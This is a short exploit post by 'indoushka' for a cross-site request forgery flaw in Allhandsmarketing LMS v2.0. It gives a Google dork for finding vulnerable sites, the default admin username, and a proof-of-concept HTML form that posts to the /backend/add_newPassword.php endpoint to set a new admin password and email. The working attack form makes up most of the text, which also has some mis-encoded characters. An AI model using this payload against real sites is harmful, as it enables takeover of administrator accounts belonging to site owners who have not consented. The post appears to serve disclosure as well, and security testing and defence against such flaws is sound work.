====================================================================================================================================
| # Title : Allhandsmarketing LMS v2.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : http://www.allhandsmarketing.com/ |
| # Dork : " Design by Allhandsmarketing." |
====================================================================================================================================
poc :
[+] Dorking Ä°n Google Or Other Search Enggine.
[+] The following html code create a new admin Password.
[+] Go to the line 1.
[+] Set the target site link Save changes and apply .
[+] infected file : /backend/add_newPassword.php .
[+] save code as poc.html .
[+] default user : admin
[+] <form class="form-horizontal" action="http://TARGET/backend/add_newPassword.php" name="form2" id="form2">
<fieldset>
<div class="form-group">
<label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>
<div class="col-md-10" id="thumbsite">
<input name="password" id="password" class="form-control" placeholder="Your new password." type="password">
</div>
</div>
<div class="form-group">
<label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>
<div class="col-md-10" id="thumbsite">
<input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">
</div>
</div>
<div class="form-group">
<label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>
<div class="col-md-10" id="thumbsite">
<input name="newEmail" value="" class="form-control" type="email">
</div>
</div>
</fieldset>
<div class="">
<div class="row">
<div class="col-md-12">
<button class="btn btn-default" type="clear">
Cancel
</button>
<button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">
<i class="fa fa-save"></i>
Submit
</button>
</div>
</div>
</div>
</form>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================